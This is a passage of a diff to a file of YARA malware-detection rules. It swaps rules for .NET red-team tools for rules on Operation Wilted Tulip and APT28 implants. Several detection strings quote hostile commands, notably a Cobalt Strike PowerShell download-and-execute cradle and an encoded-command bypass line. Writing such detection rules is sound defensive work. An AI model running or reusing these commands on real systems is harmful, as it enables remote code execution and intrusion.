 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c75906dbc3078ff81092f6a799c31afc79b1dece29db696b2ecf27951a86a1b2"
 
 	strings:
-		$typelibguid0lo = "bd346689-8ee6-40b3-858b-4ed94f08d40a" ascii wide
+		$x1 = ".\\Get_AD_Users_Logon_History.ps1 -MaxEvent" fullword ascii
+		$x2 = "if ((Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly -ErrorAction \"SilentlyContinue\").Type -eq \"PTR\")" fullword ascii
+		$x3 = "$Client_Name = (Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly).NameHost  " fullword ascii
+		$x4 = "########## Find the Computer account in AD and if not found, throw an exception ###########" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Crassus : FILE
+
+rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_Injector : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d4f94aa3-0431-5ac1-8718-0f0526c3714f"
-		date = "2023-03-18"
-		modified = "2025-08-15"
-		reference = "https://github.com/vu-ls/Crassus"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4622-L4635"
+		description = "Detects hack tool used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4cf2a31-33c8-5db1-84ca-f63b65a0a0a3"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L167-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c6442a8bd4737f0a874c388c74a632bea29c0c8b8c7cc132ad4f145d7a73446b"
+		logic_hash = "e02d26882c85b77bd97629fce20bd027e1f5f7e28ae0c43c9ea7a4b1e5d02cd1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c41e97b3b22a3f0264f10af2e71e3db44e53c6633d0d690ac4d2f8f5005708ed"
+		hash2 = "b93b5d6716a4f8eee450d9f374d0294d1800784bc99c6934246570e4baffe509"
 
 	strings:
-		$typelibguid0lo = "7e9729aa-4cf2-4d0a-8183-7fb7ce7a5b1a" ascii wide
+		$s1 = "Injector.dll" fullword ascii
+		$s2 = "ReflectiveLoader" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them ) or ( pe.exports ( "__dec" ) and pe.exports ( "_check" ) and pe.exports ( "_dec" ) and pe.exports ( "start" ) and pe.exports ( "test" ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Restrictedadmin : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Zpp : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1b3572a5-bb21-58bb-91f9-963a0a17d699"
-		date = "2023-03-18"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/RestrictedAdmin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4637-L4650"
+		description = "Detects hack tool used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7d833cb2-485e-5a26-be2f-aaebde7fdef2"
+		date = "2017-07-23"
+		modified = "2022-12-21"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L191-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "876d0a89429c3e504696a63056b154acacdfa44fddba23298c2432accb71dfd2"
+		logic_hash = "32c91f8a02443a6f024acb3f941b7f11472e7f1517c54a3c7edc89ce88ba73e0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "10ec585dc1304436821a11e35473c0710e844ba18727b302c6bd7f8ebac574bb"
+		hash2 = "7d046a3ed15035ea197235980a72d133863c372cc27545af652e1b2389c23918"
+		hash3 = "6d6816e0b9c24e904bc7c5fea5951d53465c478cc159ab900d975baf8a0921cf"
 
 	strings:
-		$typelibguid0lo = "79f11fc0-abff-4e1f-b07c-5d65653d8952" ascii wide
+		$x1 = "[ERROR] Error Main -i -s -d -gt -lt -mb" fullword wide
+		$x2 = "[ERROR] Error Main -i(with.) -s -d -gt -lt -mb -o -e" fullword wide
+		$s1 = "LT Time invalid" fullword wide
+		$s2 = "doCompressInNetWorkDirectory" fullword ascii
+		$s3 = "files remaining ,total file save = " fullword wide
+		$s4 = "$ec996350-79a4-477b-87ae-2d5b9dbe20fd" fullword ascii
+		$s5 = "Destinition Directory Not Found" fullword wide
+		$s6 = "\\obj\\Release\\ZPP.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_P2P : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Netsrv_Netsrvs : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid (p2p Remote Desktop is dual use but 100% flagged as malicious on VT)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e7b2b4bd-f1e1-5062-9b36-5df44ae374ea"
-		date = "2023-03-19"
-		modified = "2025-08-15"
-		reference = "https://github.com/miroslavpejic85/p2p"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4652-L4665"
+		description = "Detects sample from Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b58bb08-88da-535c-8ce5-e7113e5b7045"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L217-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cdbf5555f4a0dbcbd206708e8678d69ed64f20f734425becd5809396fcfa4b4"
+		logic_hash = "1506d1eddd43731c00e5f01a292589b07de5055bbdd7b1f7c2d7ac7a09b8ae58"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a062cb4364125427b54375d51e9e9afb0baeb09b05a600937f70c9d6d365f4e5"
+		hash2 = "afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77"
+		hash3 = "acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a"
+		hash4 = "bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361"
+		hash5 = "07ab795eeb16421a50c36257e6e703188a0fef9ed87647e588d0cd2fcf56fe43"
 
 	strings:
-		$typelibguid0lo = "33456e72-f8e8-4384-88c4-700867df12e2" ascii wide
+		$s1 = "Process %d Created" fullword ascii
+		$s2 = "%s\\system32\\rundll32.exe" fullword wide
+		$s3 = "%s\\SysWOW64\\rundll32.exe" fullword wide
+		$c1 = "slbhttps" fullword ascii
+		$c2 = "/slbhttps" fullword wide
+		$c3 = "/slbdnsk1" fullword wide
+		$c4 = "netsrv" fullword wide
+		$c5 = "/slbhttps" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and 1 of ( $c* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwsus : FILE
+
+rule SIGNATURE_BASE_Wiltedtulip_Reflectiveloader : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f020eea9-4ff4-5242-b9b2-53284505dab4"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/nettitude/SharpWSUS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4667-L4680"
+		description = "Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0c7dfb44-8acb-5f36-9683-745560f1f795"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L244-L268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e42a5341d03da8b7efedb6bb71b2d908881a7b0df9101e8ad56984a3372915fe"
+		logic_hash = "9488d2e97d0ea031a138e72964a3b56781f9d05c1676ff0b360407db944e26de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904"
+		hash2 = "1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a"
+		hash3 = "a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f"
+		hash4 = "cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0"
+		hash5 = "eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89"
 
 	strings:
-		$typelibguid0lo = "42cabb74-1199-40f1-9354-6294bba8d3a4" ascii wide
+		$x1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$x2 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+		$x3 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$x4 = "Failed to impersonate token from %d (%u)" fullword ascii
+		$x5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+		$x6 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 2 of them ) or pe.exports ( "_ReflectiveLoader@4" )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpimpersonation : FILE
+rule SIGNATURE_BASE_Wiltedtulip_Matryoshka_RAT : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5815c5bd-e3e8-5f2f-b03e-8a05fb4f6e91"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpImpersonation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4682-L4695"
+		description = "Detects Matryoshka RAT used in Operation Wilted Tulip"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e851e212-bb71-55c9-9bc1-0041bb04bef5"
+		date = "2017-07-23"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/tulip"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wilted_tulip.yar#L270-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fd989607bb22f903ad85905ae4fe9f84aa429f75cedd482a318d8cb6c37af19"
+		logic_hash = "9e878d9e3dc3f2050e52a046038f4f855b5b777948d928e0bc6d7a98fc0a7119"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6f208473df0d31987a4999eeea04d24b069fdb6a8245150aa91dfdc063cd64ab"
+		hash2 = "6cc1f4ecd28b833c978c8e21a20a002459b4a6c21a4fbaad637111aa9d5b1a32"
 
 	strings:
-		$typelibguid0lo = "27a85262-8c87-4147-a908-46728ab7fc73" ascii wide
+		$s1 = "%S:\\Users\\public" fullword wide
+		$s2 = "ntuser.dat.swp" fullword wide
+		$s3 = "Job Save / Load Config" fullword wide
+		$s4 = ".?AVPSCL_CLASS_JOB_SAVE_CONFIG@@" fullword ascii
+		$s5 = "winupdate64.com" fullword ascii
+		$s6 = "Job Save KeyLogger" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcloud : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "048b0239-ea13-58ff-af35-fd505b4c977a"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/chrismaddalena/SharpCloud"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4697-L4710"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "eb3fc39b-08ca-51df-a9b4-7b28b107b700"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L12-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b57f9577edcc15aef82f4fb7ceaf33bce73ae5e9d94b33152da49663a9a8f0c9"
-		score = 75
+		logic_hash = "4df04daf70da482877874c530a3ad76fddebec2946931b60f98aa6c4e31f21ae"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ca4e257e-69c1-45c5-9375-ba7874371892" ascii wide
+		$STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0
+         EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56
+         E8 ?? ?? FF FF 59}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpssdp : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8441e940-ab7c-5467-9db8-35f71bd57580"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/rvrsh3ll/SharpSSDP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4712-L4725"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "c7beab50-8e73-5161-be7e-bc3f8351873a"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L28-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3bb849d481b4db321374e084c5bc83fef683fab5f70a429d79d72988f77d8403"
-		score = 75
+		logic_hash = "c9bdf38303fadee3e2cfc99b70942a92ab382817a28401e8c8ab8035384c97c1"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "6e383de4-de89-4247-a41a-79db1dc03aaa" ascii wide
+		$STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00
+         00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 }
+		$STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81
+         80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Wiretap : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5513a295-8907-5a9c-adca-760b33004229"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/WireTap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4727-L4740"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "517133d2-813d-5f44-84c2-a53c62d7a688"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L45-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8dfe01e827fca5b6a2abb847b1615bf71c9d98ea7213b02aa94bb8691d085ac5"
-		score = 75
+		logic_hash = "e418620b45bc11804eae24db3cba8421758c214fc9f660a17761bbf3395ad744"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b5067468-f656-450a-b29c-1c84cfe8dde5" ascii wide
+		$rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Kittylitter : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V4 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f457b91f-4adb-5be6-b9c2-f6cc39d4bdaf"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/KittyLitter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4742-L4757"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "0362b885-de59-5715-80f2-106e5e91d1fa"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L60-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e0cfb39be4d51d2a929712e4f82851b9cafb46643e1403cd4ea8414624a0a2b6"
-		score = 75
+		logic_hash = "eb8e4ed38e2e4d3991543c526c7dc458eec78c517d2c5eaa06a3a3cfb48d770f"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "449cf269-4798-4268-9a0d-9a17a08869ba" ascii wide
-		$typelibguid1lo = "e7a509a4-2d44-4e10-95bf-b86cb7767c2c" ascii wide
-		$typelibguid2lo = "b2b8dd4f-eba6-42a1-a53d-9a00fe785d66" ascii wide
+		$XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ??
+         ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpview : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V5 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2ae1bc26-c137-55ce-ae2e-3204ff07f671"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/tevora-threat/SharpView"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4759-L4772"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "ac1c6175-3a8b-524b-bb18-243c52f7dba1"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L75-L91"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b87f7c5c4d72a5d9d0f493720388f4328dc519677cc8cc218c4f0f95cc970a1e"
-		score = 75
+		logic_hash = "e9660dfe76bfe1eb17b434f2ddef4975495e952396212c41550d932dbb8e8205"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii wide
+		$drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77
+         [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 }
+		$mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C
+         36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Farmer : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V7 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f69745b9-4ebd-547a-9af3-bc340b076e5d"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/mdsecactivebreach/Farmer"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4774-L4790"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "2a28273f-d9a1-5e80-bef1-b488eb0326bd"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L112-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e8559dd84fdc698c47acdf19a3f28fe094c96a36d645422f69ad905df5b2263"
-		score = 75
+		logic_hash = "ff8443460e1818fd63e4dcf678bb592940b32978a70ab1633ebaa61c590d3916"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "37da2573-d9b5-4fc2-ae11-ccb6130cea9f" ascii wide
-		$typelibguid1lo = "49acf861-1c10-49a1-bf26-139a3b3a9227" ascii wide
-		$typelibguid2lo = "9a6c028f-423f-4c2c-8db3-b3499139b822" ascii wide
-		$typelibguid3lo = "1c896837-e729-46a9-92b9-3bbe7ac2c90d" ascii wide
+		$XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aesshellcodeinjector : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6253e30b-7c92-5237-a706-e93403a7c0b6"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/san3ncrypt3d/AESShellCodeInjector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4792-L4805"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "058266d4-8dc5-5a26-9bc6-4c55ac646e9b"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L126-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "38858c4e5f13eea32d47178a9221a35be92c9fbb408a542a712ce9b708591e42"
-		score = 75
+		logic_hash = "6708239ea43fd36a7c9431cd2c6c185c0d406d65c4a31374c5e96bdc3e53de43"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b016da9e-12a1-4f1d-91a1-d681ae54e92c" ascii wide
+		$STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchromium : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V3 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5364956a-e199-556a-8055-0e7b9a7b14c8"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/SharpChromium"
